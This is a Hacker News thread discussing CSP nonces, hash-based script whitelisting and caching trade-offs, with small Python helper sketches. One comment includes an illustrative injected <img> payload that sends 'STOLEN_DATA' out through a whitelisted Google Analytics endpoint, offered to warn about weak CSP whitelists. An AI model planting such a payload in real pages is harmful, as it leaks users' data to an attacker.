Content Security Policy (CSP) for the web we have (blog.mozilla.org)
24 points by hachiya on Oct 4, 2014 | 7 comments



I like the original CSP, and while I don't take issue with them adding these extensions, both seem quirky to use...

So with nonce-based whitelisting, you really need your JavaScript blocks generated from code-behind/a framework. Since the nonce has to be rotated on every single request, it would only really be efficient to use when the entire page is regenerated on every request anyway.
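For illustration, per-request nonce generation looks roughly like this on the server (a minimal Python sketch with made-up plumbing, not any particular framework):

    import secrets

    def render_page():
        # Mint a fresh, unguessable nonce for every single response.
        nonce = secrets.token_urlsafe(16)
        headers = {
            "Content-Security-Policy": "script-src 'nonce-%s'" % nonce
        }
        # The same nonce must appear on every inline script you allow.
        body = '<script nonce="%s">doStuff();</script>' % nonce
        return headers, body

Which is exactly the problem: if the page is served statically or out of a cache, there is nowhere to do this per request.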

With the hash blocks, first off, generating the hashes will be pure hell without amazing tooling, and the devil is really in the details of exactly what the hash represents (e.g. the literal block as written, the block trimmed, the block with all whitespace removed, etc.).

If it is the literal block as written, then that is going to break a LOT. A single extra whitespace character? Broken. The source converted from Unix to Windows newlines? Broken. ASCII to Unicode conversion? Broken. Code style applied? Super-broken. And so on.
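(For what it's worth, the CSP 2 draft does take the literal interpretation: the hash is computed over the script element's exact text content, so whitespace and encoding changes really do break it. A minimal sketch of the computation in Python:)

    import base64, hashlib

    script_body = "doStuff();"  # the exact text between <script> and </script>

    digest = hashlib.sha256(script_body.encode("utf-8")).digest()
    token = base64.b64encode(digest).decode("ascii")

    # Goes into the header as: script-src 'sha256-<token>'
    header = "Content-Security-Policy: script-src 'sha256-%s'" % token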

So with both the nonce AND the hash-based approach, it seems like it has to be totally automated, and now you've effectively turned all HTML pages from "static" content into dynamic content (since in both cases you're likely regenerating the CSP elements on each "compile").

Honestly, these seem like such a PITA to use that they don't really make it easier for existing code bases to move to CSP, since finding and modifying every single JavaScript block (and then the CSP header) would be quite an undertaking. If I were going to do that, I'd just move it all into *.js files and use CSP 1.0.
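(The CSP 1.0 route is at least dead simple once everything lives in external files; a sketch of the whole policy, assuming all scripts are served from your own origin:)

    # With all JavaScript moved into external *.js files on your own
    # origin, inline script is disallowed by default and no nonces or
    # hashes are needed:
    header = "Content-Security-Policy: script-src 'self'"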


You're definitely going to need tooling for hash blocks, but I don't think it needs to be particularly sophisticated or amazing. I think you could provide pretty generic support in a couple dozen lines of PHP, or easily add it to any static site generation tool like Jekyll. But yeah, if you are purely manually writing static files in a text editor, it's going to be error-prone.
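Something along these lines (a rough Python sketch of a hypothetical build step, not an existing plugin) is about all the sophistication required:

    import base64, hashlib, re

    def csp_script_hashes(html):
        # Find every bare inline <script> block and hash its exact contents.
        # (Naive regex parsing -- fine for pages you generate yourself.)
        blocks = re.findall(r"<script>(.*?)</script>", html, re.DOTALL)
        tokens = []
        for body in blocks:
            digest = hashlib.sha256(body.encode("utf-8")).digest()
            tokens.append("'sha256-%s'" % base64.b64encode(digest).decode("ascii"))
        return "script-src %s" % " ".join(tokens)

Run that over each generated page at build time and emit the result into your server config.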

Still trying to wrap my head around the nonce -- it seems like maybe it precludes just about any kind of caching, including CDNs? That seems like kind of a non-starter.

And yeah, even though they start out talking about legacy site issues, both of these techniques seem to me more useful when you actually have some design reason to prefer or need inline scripts (there are a few), and less likely to be useful as a convenient solution for a legacy site you don't want to change much.


This is great, but every time I read "CSP" I parse it as Communicating Sequential Processes. Funny thing about cultural contexts.


One of the reasons it's important to prevent XSS is to prevent data exfiltration.

One of the things I see a lot of people doing is whitelisting third-party APIs like Google Analytics in their CSP rules. Well... these can be used to exfiltrate data too...

There are a TON of third-party APIs that can't be safely whitelisted with CSP. A whitelist for GA or Stripe on all pages means you are poking holes in your CSP... and poking holes in anything usually has issues associated with it.
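To make that concrete: if www.google-analytics.com is whitelisted, anything that achieves injection can smuggle data out through it, and CSP won't object. (Illustrative sketch; the endpoint and parameters are GA's public Measurement Protocol, the payload itself is hypothetical:)

    # A typical "just whitelist GA" policy:
    policy = "img-src 'self' https://www.google-analytics.com"

    # An injected payload can ride the whitelisted origin straight out --
    # this is a perfectly valid, CSP-permitted image load:
    payload = ('<img src="https://www.google-analytics.com/collect'
               '?v=1&tid=UA-ATTACKER-1&cid=1&t=event&el=STOLEN_DATA">')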


Not particularly relevant, but still ironic that this page about CSP gives me a mixed content warning.


The mixed content warning only happens in Chrome. They just need to change the comment form's action:

    <form id="comment-form" action="http://blog.mozilla.org/security/wp-comments-post.php" method="post">
In this case, the form could submit data over unencrypted HTTP, so Chrome warns. Firefox seems to be oblivious to the issue.


Firefox will warn when you try to submit the form.

Filed https://bugzilla.mozilla.org/show_bug.cgi?id=1077880.



